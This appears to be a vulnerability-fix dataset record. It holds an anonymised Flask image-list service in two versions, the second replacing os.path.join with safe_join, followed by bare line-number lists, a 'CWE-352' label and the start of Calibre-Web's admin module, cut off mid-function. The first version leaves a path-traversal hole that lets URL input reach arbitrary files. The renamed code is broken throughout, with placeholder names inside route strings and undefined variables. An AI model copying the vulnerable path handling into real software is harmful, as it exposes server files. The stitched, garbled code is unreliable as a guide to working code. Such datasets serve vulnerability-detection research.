VAR_4 = VAR_6.dataroot
VAR_7 = Blueprint('mixer_store', __name__)
VAR_8 = logging.getLogger(__name__)
@VAR_7.route('/base/<VAR_9>/mixers/<VAR_10>/VAR_29/<VAR_13>')
@VAR_7.route('/base/<VAR_9>/mixers/<VAR_10>/VAR_29/<VAR_13>/' +
'classes/<VAR_14>')
@VAR_7.route('/base/<VAR_9>/mixers/<VAR_10>/VAR_29/<VAR_13>/' +
'classes/<VAR_14>/VAR_15/<int:VAR_15>/VAR_16/<int:VAR_16>')
@VAR_7.route('/base/<VAR_9>/distrbuted/<int:VAR_11>of<int:VAR_12>/' +
'mixers/<VAR_10>/VAR_29/<VAR_13>')
@VAR_7.route('/base/<VAR_9>/distrbuted/<int:VAR_11>of<int:VAR_12>/' +
'mixers/<VAR_10>/VAR_29/<VAR_13>/VAR_14/<VAR_14>')
def FUNC_1(VAR_9, VAR_10=None, VAR_11=1, VAR_12=1, VAR_13=None,
VAR_14=None, VAR_15=0, VAR_16=-1):
VAR_17 = FUNC_4(VAR_10, VAR_14)
VAR_21 = int((VAR_11-1)*(1.0/VAR_12)*len(VAR_17))
VAR_22 = int(VAR_11*(1.0/VAR_12)*len(VAR_17))
mixer_list = VAR_17[VAR_21:VAR_22]
print("Mixer Size {}".format(len(VAR_17)))
sys.stdout.flush()
return FUNC_2(VAR_9, VAR_13, VAR_17, VAR_15, VAR_16)
@VAR_7.route('/base/<VAR_9>/VAR_29/<VAR_13>')
@VAR_7.route('/base/<VAR_9>/VAR_29/<VAR_13>/VAR_15/<int:VAR_15>/VAR_16/<int:VAR_16>')
def FUNC_2(VAR_9, VAR_13=None, VAR_17=None, VAR_15=0, VAR_16=-1):
print("Enter Scope")
sys.stdout.flush()
VAR_23 = []
VAR_24, VAR_25 = FUNC_3(VAR_13)
if VAR_9 != "0":
VAR_38 = FUNC_11('GIDIDX' + VAR_9.upper())
with open(VAR_38, 'r') as f:
VAR_23 = list(f.readlines())
if VAR_16 > 0:
VAR_23 = base_list[VAR_15:start+VAR_16]
elif VAR_15 > 0:
VAR_23 = base_list[VAR_15:]
VAR_39 = len(VAR_23)
VAR_26 = bool(VAR_17 and VAR_23)
if VAR_23:
VAR_39 = len(VAR_23) #base_entries
else:
VAR_39 = len(VAR_17)
VAR_23 = VAR_17.copy()
del VAR_17
random.seed(VAR_24)
VAR_27 = 0
if VAR_26:
random.Random(VAR_24).shuffle(VAR_17)
VAR_27 = int(VAR_25*VAR_39)
total_entries = VAR_39 + VAR_27
def FUNC_13():
yield '<?xml version="1.0" encoding="UTF-8" ?>\n'
if VAR_1:
yield '<?xml-stylesheet type="text/xsl" href="/scopelist.xsl" ?>\n'
yield '<objectlist count="{:d}">\n'.format(VAR_39)
VAR_40 = 0
VAR_41 = 0
if VAR_26:
VAR_40 = int(VAR_25 * VAR_5)
VAR_44 = cycle(VAR_17)
VAR_42 = []
def FUNC_15():
random.seed(VAR_24)
return list(map(lambda x: x + VAR_5*VAR_41,
sorted(random.sample(list(range(VAR_5)), VAR_40))))
for count in range(VAR_39):
if not count % VAR_5 and VAR_26:
VAR_42 = FUNC_15()
VAR_41 += 1
if count in VAR_42:
VAR_20 = next(VAR_44).strip()
else:
VAR_20 = VAR_23.pop(0).strip()
yield FUNC_7(VAR_19=VAR_20) + '\n'
yield '</objectlist>\n'
VAR_28 = Headers([('Content-Type', 'text/xml')])
return Response(stream_with_context(FUNC_13()),
status="200 OK",
VAR_28=headers)
def FUNC_3(VAR_13):
VAR_29 = VAR_13.split('_')
VAR_30 = VAR_29[0]
VAR_24 = int(VAR_29[1])
VAR_25 = 0.0001
if VAR_30 == 'r':
VAR_24 = None
if len(VAR_29) > 2:
VAR_25 = float(VAR_29[2])/100.
return VAR_24, round(VAR_25, 4)
def FUNC_4(VAR_18, VAR_14=None):
VAR_31 = FUNC_11('GIDIDX' + VAR_18.upper())
VAR_32 = []
if VAR_14:
classes.replace('%2C', ',')
VAR_14.replace('%20', ' ')
VAR_32 = VAR_14.split(',')
def FUNC_14():
with open(VAR_31, 'r') as f:
VAR_43 = f.readline()
VAR_43 = '/'.join(VAR_43.split('/')[:-2])
VAR_33 = []
for c in VAR_32:
VAR_33.append(FUNC_10(VAR_43+'/'+c.strip()))
return VAR_33
VAR_17 = []
VAR_33 = FUNC_14()
print("Class paths : {}".format(VAR_33))
sys.stdout.flush()
if VAR_33:
for VAR_34 in VAR_33:
print("Path Exists ? {}".format(os.path.exists(VAR_34)))
sys.stdout.flush()
VAR_17.extend(sorted(glob.glob(os.path.join(VAR_34, "*.jpg"))))
VAR_17 = [FUNC_9(l.strip()) for l in VAR_17]
else:
with open(VAR_31, 'r') as f:
VAR_17 = list(f.readlines())
return VAR_17
@VAR_7.route('/id/<VAR_34:VAR_19>')
def FUNC_5(VAR_19):
VAR_28 = Headers([('Content-Type', 'text/xml')])
return Response(FUNC_7(VAR_19=object_path),
"200 OK",
VAR_28=headers)
@VAR_7.route('/meta/<VAR_34:VAR_19>')
def FUNC_6(VAR_19):
VAR_34 = FUNC_10(VAR_19)
VAR_35 = dict()
try:
VAR_35['_gt_label'] = VAR_34.split('/')[-2]
except IOError:
pass
return jsonify(VAR_35)
def FUNC_7(VAR_19):
VAR_34 = FUNC_10(VAR_19)
VAR_36 = '/'.join(VAR_34.split('/')[:-2])+'/VAR_14.txt'
if os.path.isfile(VAR_36):
return '<object id={} src={} meta={} />' \
.format(quoteattr(url_for('.get_object_id', VAR_19=object_path)),
quoteattr(FUNC_8(VAR_19)),
quoteattr(url_for('.get_object_meta', VAR_19=object_path)))
return '<object id={} src={} />' \
.format(quoteattr(url_for('.get_object_id', VAR_19=object_path)),
quoteattr(FUNC_8(VAR_19)))
def FUNC_8(VAR_19):
if VAR_2:
return 'file://' + FUNC_10(VAR_19)
return url_for('.get_object_src_http', VAR_20=VAR_19)
def FUNC_9(VAR_20):
return VAR_20.replace(VAR_4+'/', '')
def FUNC_10(VAR_20):
return os.path.join(VAR_4, VAR_20)
def FUNC_11(VAR_11):
return os.path.join(VAR_3, VAR_11)
@VAR_7.route('/obj/<VAR_34:VAR_20>')
def FUNC_12(VAR_20):
VAR_34 = FUNC_10(VAR_20)
VAR_28 = Headers()
VAR_37 = send_file(VAR_34,
cache_timeout=datetime.timedelta(
days=365).total_seconds(),
add_etags=True,
conditional=True)
VAR_37.headers.extend(VAR_28)
return VAR_37
|
from builtins import next
from builtins import range
import os
import datetime
from xml.sax.saxutils import quoteattr
import sys
import logging
import random
import glob
from itertools import cycle
from flask import Blueprint, url_for, Response, stream_with_context, send_file, \
jsonify
from werkzeug.datastructures import Headers
from werkzeug.security import safe_join
VAR_0 = 'cocktail'
VAR_1 = False
VAR_2 = True # if true, return local file VAR_34, otherwise http.
VAR_3 = VAR_4 = None
VAR_5 = int(1e4)
"""
Example cocktail url:
/cocktail/base/FFFFFFFFFFFFFFFF/distrbuted/1of2/ \
mixers/FFFFFFFFFFFFFFFC/VAR_29/d_42_1.0/VAR_14/gull,cardinal
/cocktail/base/"0"/mixers/FFFFFFFFFFFFFFFC/VAR_29/d_42_1.0
/cocktail/base/FFFFFFFFFFFFFFFF/VAR_29/d_42_1.0
"""
def FUNC_0(VAR_6):
global VAR_3, VAR_4 # pylint: disable=global-statement
VAR_3 = VAR_6.indexdir
VAR_4 = VAR_6.dataroot
VAR_7 = Blueprint('mixer_store', __name__)
VAR_8 = logging.getLogger(__name__)
@VAR_7.route('/base/<VAR_9>/mixers/<VAR_10>/VAR_29/<VAR_13>')
@VAR_7.route('/base/<VAR_9>/mixers/<VAR_10>/VAR_29/<VAR_13>/' +
'classes/<VAR_14>')
@VAR_7.route('/base/<VAR_9>/mixers/<VAR_10>/VAR_29/<VAR_13>/' +
'classes/<VAR_14>/VAR_15/<int:VAR_15>/VAR_16/<int:VAR_16>')
@VAR_7.route('/base/<VAR_9>/distrbuted/<int:VAR_11>of<int:VAR_12>/' +
'mixers/<VAR_10>/VAR_29/<VAR_13>')
@VAR_7.route('/base/<VAR_9>/distrbuted/<int:VAR_11>of<int:VAR_12>/' +
'mixers/<VAR_10>/VAR_29/<VAR_13>/VAR_14/<VAR_14>')
def FUNC_1(VAR_9, VAR_10=None, VAR_11=1, VAR_12=1, VAR_13=None,
VAR_14=None, VAR_15=0, VAR_16=-1):
VAR_17 = FUNC_4(VAR_10, VAR_14)
VAR_21 = int((VAR_11-1)*(1.0/VAR_12)*len(VAR_17))
VAR_22 = int(VAR_11*(1.0/VAR_12)*len(VAR_17))
mixer_list = VAR_17[VAR_21:VAR_22]
print("Mixer Size {}".format(len(VAR_17)))
sys.stdout.flush()
return FUNC_2(VAR_9, VAR_13, VAR_17, VAR_15, VAR_16)
@VAR_7.route('/base/<VAR_9>/VAR_29/<VAR_13>')
@VAR_7.route('/base/<VAR_9>/VAR_29/<VAR_13>/VAR_15/<int:VAR_15>/VAR_16/<int:VAR_16>')
def FUNC_2(VAR_9, VAR_13=None, VAR_17=None, VAR_15=0, VAR_16=-1):
print("Enter Scope")
sys.stdout.flush()
VAR_23 = []
VAR_24, VAR_25 = FUNC_3(VAR_13)
if VAR_9 != "0":
VAR_38 = FUNC_11('GIDIDX' + VAR_9.upper())
with open(VAR_38, 'r') as f:
VAR_23 = list(f.readlines())
if VAR_16 > 0:
VAR_23 = base_list[VAR_15:start+VAR_16]
elif VAR_15 > 0:
VAR_23 = base_list[VAR_15:]
VAR_39 = len(VAR_23)
VAR_26 = bool(VAR_17 and VAR_23)
if VAR_23:
VAR_39 = len(VAR_23) #base_entries
else:
VAR_39 = len(VAR_17)
VAR_23 = VAR_17.copy()
del VAR_17
random.seed(VAR_24)
VAR_27 = 0
if VAR_26:
random.Random(VAR_24).shuffle(VAR_17)
VAR_27 = int(VAR_25*VAR_39)
total_entries = VAR_39 + VAR_27
def FUNC_13():
yield '<?xml version="1.0" encoding="UTF-8" ?>\n'
if VAR_1:
yield '<?xml-stylesheet type="text/xsl" href="/scopelist.xsl" ?>\n'
yield '<objectlist count="{:d}">\n'.format(VAR_39)
VAR_40 = 0
VAR_41 = 0
if VAR_26:
VAR_40 = int(VAR_25 * VAR_5)
VAR_44 = cycle(VAR_17)
VAR_42 = []
def FUNC_15():
random.seed(VAR_24)
return list(map(lambda x: x + VAR_5*VAR_41,
sorted(random.sample(list(range(VAR_5)), VAR_40))))
for count in range(VAR_39):
if not count % VAR_5 and VAR_26:
VAR_42 = FUNC_15()
VAR_41 += 1
if count in VAR_42:
VAR_20 = next(VAR_44).strip()
else:
VAR_20 = VAR_23.pop(0).strip()
yield FUNC_7(VAR_19=VAR_20) + '\n'
yield '</objectlist>\n'
VAR_28 = Headers([('Content-Type', 'text/xml')])
return Response(stream_with_context(FUNC_13()),
status="200 OK",
VAR_28=headers)
def FUNC_3(VAR_13):
VAR_29 = VAR_13.split('_')
VAR_30 = VAR_29[0]
VAR_24 = int(VAR_29[1])
VAR_25 = 0.0001
if VAR_30 == 'r':
VAR_24 = None
if len(VAR_29) > 2:
VAR_25 = float(VAR_29[2])/100.
return VAR_24, round(VAR_25, 4)
def FUNC_4(VAR_18, VAR_14=None):
VAR_31 = FUNC_11('GIDIDX' + VAR_18.upper())
VAR_32 = []
if VAR_14:
classes.replace('%2C', ',')
VAR_14.replace('%20', ' ')
VAR_32 = VAR_14.split(',')
def FUNC_14():
with open(VAR_31, 'r') as f:
VAR_43 = f.readline()
VAR_43 = '/'.join(VAR_43.split('/')[:-2])
VAR_33 = []
for c in VAR_32:
VAR_33.append(FUNC_10(VAR_43+'/'+c.strip()))
return VAR_33
VAR_17 = []
VAR_33 = FUNC_14()
print("Class paths : {}".format(VAR_33))
sys.stdout.flush()
if VAR_33:
for VAR_34 in VAR_33:
print("Path Exists ? {}".format(os.path.exists(VAR_34)))
sys.stdout.flush()
VAR_17.extend(sorted(glob.glob(os.path.join(VAR_34, "*.jpg"))))
VAR_17 = [FUNC_9(l.strip()) for l in VAR_17]
else:
with open(VAR_31, 'r') as f:
VAR_17 = list(f.readlines())
return VAR_17
@VAR_7.route('/id/<VAR_34:VAR_19>')
def FUNC_5(VAR_19):
VAR_28 = Headers([('Content-Type', 'text/xml')])
return Response(FUNC_7(VAR_19=object_path),
"200 OK",
VAR_28=headers)
@VAR_7.route('/meta/<VAR_34:VAR_19>')
def FUNC_6(VAR_19):
VAR_34 = FUNC_10(VAR_19)
VAR_35 = dict()
try:
VAR_35['_gt_label'] = VAR_34.split('/')[-2]
except IOError:
pass
return jsonify(VAR_35)
def FUNC_7(VAR_19):
VAR_34 = FUNC_10(VAR_19)
VAR_36 = '/'.join(VAR_34.split('/')[:-2])+'/VAR_14.txt'
if os.path.isfile(VAR_36):
return '<object id={} src={} meta={} />' \
.format(quoteattr(url_for('.get_object_id', VAR_19=object_path)),
quoteattr(FUNC_8(VAR_19)),
quoteattr(url_for('.get_object_meta', VAR_19=object_path)))
return '<object id={} src={} />' \
.format(quoteattr(url_for('.get_object_id', VAR_19=object_path)),
quoteattr(FUNC_8(VAR_19)))
def FUNC_8(VAR_19):
if VAR_2:
return 'file://' + FUNC_10(VAR_19)
return url_for('.get_object_src_http', VAR_20=VAR_19)
def FUNC_9(VAR_20):
return VAR_20.replace(VAR_4+'/', '')
def FUNC_10(VAR_20):
return safe_join(VAR_4, VAR_20)
def FUNC_11(VAR_11):
return safe_join(VAR_3, VAR_11)
@VAR_7.route('/obj/<VAR_34:VAR_20>')
def FUNC_12(VAR_20):
VAR_34 = FUNC_10(VAR_20)
VAR_28 = Headers()
VAR_37 = send_file(VAR_34,
cache_timeout=datetime.timedelta(
days=365).total_seconds(),
add_etags=True,
conditional=True)
VAR_37.headers.extend(VAR_28)
return VAR_37
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
19,
27,
33,
41,
42,
47,
48,
50,
52,
64,
71,
73,
90,
91,
93,
100,
102,
103,
109,
110,
111,
113,
117,
119,
125,
127,
132,
137,
143,
145,
147,
151,
162,
167,
171,
180,
189,
194,
199,
205,
207,
214,
215,
220,
225,
227,
228,
240,
241,
245,
247,
250,
253,
254,
257,
258,
262,
264,
265,
273,
164,
165,
166,
167,
168,
169,
170,
171,
172,
173
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
19,
28,
34,
42,
43,
48,
49,
51,
53,
65,
72,
74,
91,
92,
94,
101,
103,
104,
110,
111,
112,
114,
118,
120,
126,
128,
133,
138,
144,
146,
148,
152,
163,
168,
172,
181,
190,
195,
200,
206,
208,
215,
216,
221,
226,
228,
229,
241,
242,
246,
248,
251,
254,
255,
258,
259,
263,
265,
266,
274,
165,
166,
167,
168,
169,
170,
171,
172,
173,
174
] |
3CWE-352
| # -*- coding: utf-8 -*-
# This file is part of the Calibre-Web (https://github.com/janeczku/calibre-web)
# Copyright (C) 2018-2019 OzzieIsaacs, cervinko, jkrehm, bodybybuddha, ok11,
# andy29485, idalin, Kyosfonica, wuqi, Kennyl, lemmsh,
# falgh1, grunjol, csitko, ytils, xybydy, trasba, vrabe,
# ruben-herold, marblepebble, JackED42, SiphonSquirrel,
# apetresc, nanu-c, mutschler, GammaC0de, vuolter
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import re
import base64
import json
import time
import operator
from datetime import datetime, timedelta
from babel import Locale as LC
from babel.dates import format_datetime
from flask import Blueprint, flash, redirect, url_for, abort, request, make_response, send_from_directory, g, Response
from flask_login import login_required, current_user, logout_user, confirm_login
from flask_babel import gettext as _
from flask import session as flask_session
from sqlalchemy import and_
from sqlalchemy.orm.attributes import flag_modified
from sqlalchemy.exc import IntegrityError, OperationalError, InvalidRequestError
from sqlalchemy.sql.expression import func, or_, text
from . import constants, logger, helper, services
from . import db, calibre_db, ub, web_server, get_locale, config, updater_thread, babel, gdriveutils, kobo_sync_status
from .helper import check_valid_domain, send_test_mail, reset_password, generate_password_hash, check_email, \
valid_email, check_username
from .gdriveutils import is_gdrive_ready, gdrive_support
from .render_template import render_title_template, get_sidebar_config
from . import debug_info, _BABEL_TRANSLATIONS
try:
from functools import wraps
except ImportError:
pass # We're not using Python 3
log = logger.create()
feature_support = {
'ldap': bool(services.ldap),
'goodreads': bool(services.goodreads_support),
'kobo': bool(services.kobo),
'updater': constants.UPDATER_AVAILABLE,
'gmail': bool(services.gmail)
}
try:
import rarfile # pylint: disable=unused-import
feature_support['rar'] = True
except (ImportError, SyntaxError):
feature_support['rar'] = False
try:
from .oauth_bb import oauth_check, oauthblueprints
feature_support['oauth'] = True
except ImportError as err:
log.debug('Cannot import Flask-Dance, login with Oauth will not work: %s', err)
feature_support['oauth'] = False
oauthblueprints = []
oauth_check = {}
feature_support['gdrive'] = gdrive_support
admi = Blueprint('admin', __name__)
def admin_required(f):
"""
Checks if current_user.role == 1
"""
@wraps(f)
def inner(*args, **kwargs):
if current_user.role_admin():
return f(*args, **kwargs)
abort(403)
return inner
@admi.before_app_request
def before_request():
# make remember me function work
if current_user.is_authenticated:
confirm_login()
if not ub.check_user_session(current_user.id, flask_session.get('_id')) and 'opds' not in request.path:
logout_user()
g.constants = constants
g.user = current_user
g.allow_registration = config.config_public_reg
g.allow_anonymous = config.config_anonbrowse
g.allow_upload = config.config_uploading
g.current_theme = config.config_theme
g.config_authors_max = config.config_authors_max
g.shelves_access = ub.session.query(ub.Shelf).filter(
or_(ub.Shelf.is_public == 1, ub.Shelf.user_id == current_user.id)).order_by(ub.Shelf.name).all()
if '/static/' not in request.path and not config.db_configured and \
request.endpoint not in ('admin.ajax_db_config',
'admin.simulatedbchange',
'admin.db_configuration',
'web.login',
'web.logout',
'admin.load_dialogtexts',
'admin.ajax_pathchooser'):
return redirect(url_for('admin.db_configuration'))
@admi.route("/admin")
@login_required
def admin_forbidden():
abort(403)
@admi.route("/shutdown")
@login_required
@admin_required
def shutdown():
task = int(request.args.get("parameter").strip())
showtext = {}
if task in (0, 1): # valid commandos received
# close all database connections
calibre_db.dispose()
ub.dispose()
if task == 0:
showtext['text'] = _(u'Server restarted, please reload page')
else:
showtext['text'] = _(u'Performing shutdown of server, please close window')
# stop gevent/tornado server
web_server.stop(task == 0)
return json.dumps(showtext)
if task == 2:
log.warning("reconnecting to calibre database")
calibre_db.reconnect_db(config, ub.app_DB_path)
showtext['text'] = _(u'Reconnect successful')
return json.dumps(showtext)
showtext['text'] = _(u'Unknown command')
return json.dumps(showtext), 400
@admi.route("/admin/view")
@login_required
@admin_required
def admin():
version = updater_thread.get_current_version_info()
if version is False:
commit = _(u'Unknown')
else:
if 'datetime' in version:
commit = version['datetime']
tz = timedelta(seconds=time.timezone if (time.localtime().tm_isdst == 0) else time.altzone)
form_date = datetime.strptime(commit[:19], "%Y-%m-%dT%H:%M:%S")
if len(commit) > 19: # check if string has timezone
if commit[19] == '+':
form_date -= timedelta(hours=int(commit[20:22]), minutes=int(commit[23:]))
elif commit[19] == '-':
form_date += timedelta(hours=int(commit[20:22]), minutes=int(commit[23:]))
commit = format_datetime(form_date - tz, format='short', locale=get_locale())
else:
commit = version['version']
allUser = ub.session.query(ub.User).all()
email_settings = config.get_mail_settings()
kobo_support = feature_support['kobo'] and config.config_kobo_sync
return render_title_template("admin.html", allUser=allUser, email=email_settings, config=config, commit=commit,
feature_support=feature_support, kobo_support=kobo_support,
title=_(u"Admin page"), page="admin")
@admi.route("/admin/dbconfig", methods=["GET", "POST"])
@login_required
@admin_required
def db_configuration():
if request.method == "POST":
return _db_configuration_update_helper()
return _db_configuration_result()
@admi.route("/admin/config", methods=["GET"])
@login_required
@admin_required
def configuration():
return render_title_template("config_edit.html",
config=config,
provider=oauthblueprints,
feature_support=feature_support,
title=_(u"Basic Configuration"), page="config")
@admi.route("/admin/ajaxconfig", methods=["POST"])
@login_required
@admin_required
def ajax_config():
return _configuration_update_helper()
@admi.route("/admin/ajaxdbconfig", methods=["POST"])
@login_required
@admin_required
def ajax_db_config():
return _db_configuration_update_helper()
@admi.route("/admin/alive", methods=["GET"])
@login_required
@admin_required
def calibreweb_alive():
return "", 200
@admi.route("/admin/viewconfig")
@login_required
@admin_required
def view_configuration():
read_column = calibre_db.session.query(db.Custom_Columns)\
.filter(and_(db.Custom_Columns.datatype == 'bool', db.Custom_Columns.mark_for_delete == 0)).all()
restrict_columns = calibre_db.session.query(db.Custom_Columns)\
.filter(and_(db.Custom_Columns.datatype == 'text', db.Custom_Columns.mark_for_delete == 0)).all()
languages = calibre_db.speaking_language()
translations = [LC('en')] + babel.list_translations()
return render_title_template("config_view_edit.html", conf=config, readColumns=read_column,
restrictColumns=restrict_columns,
languages=languages,
translations=translations,
title=_(u"UI Configuration"), page="uiconfig")
@admi.route("/admin/usertable")
@login_required
@admin_required
def edit_user_table():
visibility = current_user.view_settings.get('useredit', {})
languages = calibre_db.speaking_language()
translations = babel.list_translations() + [LC('en')]
allUser = ub.session.query(ub.User)
tags = calibre_db.session.query(db.Tags)\
.join(db.books_tags_link)\
.join(db.Books)\
.filter(calibre_db.common_filters()) \
.group_by(text('books_tags_link.tag'))\
.order_by(db.Tags.name).all()
if config.config_restricted_column:
custom_values = calibre_db.session.query(db.cc_classes[config.config_restricted_column]).all()
else:
custom_values = []
if not config.config_anonbrowse:
allUser = allUser.filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS)
kobo_support = feature_support['kobo'] and config.config_kobo_sync
return render_title_template("user_table.html",
users=allUser.all(),
tags=tags,
custom_values=custom_values,
translations=translations,
languages=languages,
visiblility=visibility,
all_roles=constants.ALL_ROLES,
kobo_support=kobo_support,
sidebar_settings=constants.sidebar_settings,
title=_(u"Edit Users"),
page="usertable")
@admi.route("/ajax/listusers")
@login_required
@admin_required
def list_users():
off = int(request.args.get("offset") or 0)
limit = int(request.args.get("limit") or 10)
search = request.args.get("search")
sort = request.args.get("sort", "id")
order = request.args.get("order", "").lower()
state = None
if sort == "state":
state = json.loads(request.args.get("state", "[]"))
if sort != "state" and order:
order = text(sort + " " + order)
elif not state:
order = ub.User.id.asc()
all_user = ub.session.query(ub.User)
if not config.config_anonbrowse:
all_user = all_user.filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS)
total_count = filtered_count = all_user.count()
if search:
all_user = all_user.filter(or_(func.lower(ub.User.name).ilike("%" + search + "%"),
func.lower(ub.User.kindle_mail).ilike("%" + search + "%"),
func.lower(ub.User.email).ilike("%" + search + "%")))
if state:
users = calibre_db.get_checkbox_sorted(all_user.all(), state, off, limit, request.args.get("order", "").lower())
else:
users = all_user.order_by(order).offset(off).limit(limit).all()
if search:
filtered_count = len(users)
for user in users:
if user.default_language == "all":
user.default = _("All")
else:
user.default = LC.parse(user.default_language).get_language_name(get_locale())
table_entries = {'totalNotFiltered': total_count, 'total': filtered_count, "rows": users}
js_list = json.dumps(table_entries, cls=db.AlchemyEncoder)
response = make_response(js_list)
response.headers["Content-Type"] = "application/json; charset=utf-8"
return response
@admi.route("/ajax/deleteuser", methods=['POST'])
@login_required
@admin_required
def delete_user():
user_ids = request.form.to_dict(flat=False)
users = None
if "userid[]" in user_ids:
users = ub.session.query(ub.User).filter(ub.User.id.in_(user_ids['userid[]'])).all()
elif "userid" in user_ids:
users = ub.session.query(ub.User).filter(ub.User.id == user_ids['userid'][0]).all()
count = 0
errors = list()
success = list()
if not users:
log.error("User not found")
return Response(json.dumps({'type': "danger", 'message': _("User not found")}), mimetype='application/json')
for user in users:
try:
message = _delete_user(user)
count += 1
except Exception as ex:
log.error(ex)
errors.append({'type': "danger", 'message': str(ex)})
if count == 1:
log.info("User {} deleted".format(user_ids))
success = [{'type': "success", 'message': message}]
elif count > 1:
log.info("Users {} deleted".format(user_ids))
success = [{'type': "success", 'message': _("{} users deleted successfully").format(count)}]
success.extend(errors)
return Response(json.dumps(success), mimetype='application/json')
@admi.route("/ajax/getlocale")
@login_required
@admin_required
def table_get_locale():
locale = babel.list_translations() + [LC('en')]
ret = list()
current_locale = get_locale()
for loc in locale:
ret.append({'value': str(loc), 'text': loc.get_language_name(current_locale)})
return json.dumps(ret)
@admi.route("/ajax/getdefaultlanguage")
@login_required
@admin_required
def table_get_default_lang():
languages = calibre_db.speaking_language()
ret = list()
ret.append({'value': 'all', 'text': _('Show All')})
for lang in languages:
ret.append({'value': lang.lang_code, 'text': lang.name})
return json.dumps(ret)
@admi.route("/ajax/editlistusers/<param>", methods=['POST'])
@login_required
@admin_required
def edit_list_user(param):
vals = request.form.to_dict(flat=False)
all_user = ub.session.query(ub.User)
if not config.config_anonbrowse:
all_user = all_user.filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS)
# only one user is posted
if "pk" in vals:
users = [all_user.filter(ub.User.id == vals['pk'][0]).one_or_none()]
else:
if "pk[]" in vals:
users = all_user.filter(ub.User.id.in_(vals['pk[]'])).all()
else:
return _("Malformed request"), 400
if 'field_index' in vals:
vals['field_index'] = vals['field_index'][0]
if 'value' in vals:
vals['value'] = vals['value'][0]
elif not ('value[]' in vals):
return _("Malformed request"), 400
for user in users:
try:
if param in ['denied_tags', 'allowed_tags', 'allowed_column_value', 'denied_column_value']:
if 'value[]' in vals:
setattr(user, param, prepare_tags(user, vals['action'][0], param, vals['value[]']))
else:
setattr(user, param, vals['value'].strip())
else:
vals['value'] = vals['value'].strip()
if param == 'name':
if user.name == "Guest":
raise Exception(_("Guest Name can't be changed"))
user.name = check_username(vals['value'])
elif param =='email':
user.email = check_email(vals['value'])
elif param =='kobo_only_shelves_sync':
user.kobo_only_shelves_sync = int(vals['value'] == 'true')
elif param == 'kindle_mail':
user.kindle_mail = valid_email(vals['value']) if vals['value'] else ""
elif param.endswith('role'):
value = int(vals['field_index'])
if user.name == "Guest" and value in \
[constants.ROLE_ADMIN, constants.ROLE_PASSWD, constants.ROLE_EDIT_SHELFS]:
raise Exception(_("Guest can't have this role"))
# check for valid value, last on checks for power of 2 value
if value > 0 and value <= constants.ROLE_VIEWER and (value & value-1 == 0 or value == 1):
if vals['value'] == 'true':
user.role |= value
elif vals['value'] == 'false':
if value == constants.ROLE_ADMIN:
if not ub.session.query(ub.User).\
filter(ub.User.role.op('&')(constants.ROLE_ADMIN) == constants.ROLE_ADMIN,
ub.User.id != user.id).count():
return Response(
json.dumps([{'type': "danger",
'message':_(u"No admin user remaining, can't remove admin role",
nick=user.name)}]), mimetype='application/json')
user.role &= ~value
else:
raise Exception(_("Value has to be true or false"))
else:
raise Exception(_("Invalid role"))
elif param.startswith('sidebar'):
value = int(vals['field_index'])
if user.name == "Guest" and value == constants.SIDEBAR_READ_AND_UNREAD:
raise Exception(_("Guest can't have this view"))
# check for valid value, last on checks for power of 2 value
if value > 0 and value <= constants.SIDEBAR_LIST and (value & value-1 == 0 or value == 1):
if vals['value'] == 'true':
user.sidebar_view |= value
elif vals['value'] == 'false':
user.sidebar_view &= ~value
else:
raise Exception(_("Value has to be true or false"))
else:
raise Exception(_("Invalid view"))
elif param == 'locale':
if user.name == "Guest":
raise Exception(_("Guest's Locale is determined automatically and can't be set"))
if vals['value'] in _BABEL_TRANSLATIONS:
user.locale = vals['value']
else:
raise Exception(_("No Valid Locale Given"))
elif param == 'default_language':
languages = calibre_db.session.query(db.Languages) \
.join(db.books_languages_link) \
.join(db.Books) \
.filter(calibre_db.common_filters()) \
.group_by(text('books_languages_link.lang_code')).all()
lang_codes = [lang.lang_code for lang in languages] + ["all"]
if vals['value'] in lang_codes:
user.default_language = vals['value']
else:
raise Exception(_("No Valid Book Language Given"))
else:
return _("Parameter not found"), 400
except Exception as ex:
log.debug_or_exception(ex)
return str(ex), 400
ub.session_commit()
return ""
@admi.route("/ajax/user_table_settings", methods=['POST'])
@login_required
@admin_required
def update_table_settings():
current_user.view_settings['useredit'] = json.loads(request.data)
try:
try:
flag_modified(current_user, "view_settings")
except AttributeError:
pass
ub.session.commit()
except (InvalidRequestError, OperationalError):
log.error("Invalid request received: {}".format(request))
return "Invalid request", 400
return ""
def check_valid_read_column(column):
if column != "0":
if not calibre_db.session.query(db.Custom_Columns).filter(db.Custom_Columns.id == column) \
.filter(and_(db.Custom_Columns.datatype == 'bool', db.Custom_Columns.mark_for_delete == 0)).all():
return False
return True
def check_valid_restricted_column(column):
if column != "0":
if not calibre_db.session.query(db.Custom_Columns).filter(db.Custom_Columns.id == column) \
.filter(and_(db.Custom_Columns.datatype == 'text', db.Custom_Columns.mark_for_delete == 0)).all():
return False
return True
@admi.route("/admin/viewconfig", methods=["POST"])
@login_required
@admin_required
def update_view_configuration():
to_save = request.form.to_dict()
_config_string(to_save, "config_calibre_web_title")
_config_string(to_save, "config_columns_to_ignore")
if _config_string(to_save, "config_title_regex"):
calibre_db.update_title_sort(config)
if not check_valid_read_column(to_save.get("config_read_column", "0")):
flash(_(u"Invalid Read Column"), category="error")
log.debug("Invalid Read column")
return view_configuration()
_config_int(to_save, "config_read_column")
if not check_valid_restricted_column(to_save.get("config_restricted_column", "0")):
flash(_(u"Invalid Restricted Column"), category="error")
log.debug("Invalid Restricted Column")
return view_configuration()
_config_int(to_save, "config_restricted_column")
_config_int(to_save, "config_theme")
_config_int(to_save, "config_random_books")
_config_int(to_save, "config_books_per_page")
_config_int(to_save, "config_authors_max")
_config_string(to_save, "config_default_language")
_config_string(to_save, "config_default_locale")
config.config_default_role = constants.selected_roles(to_save)
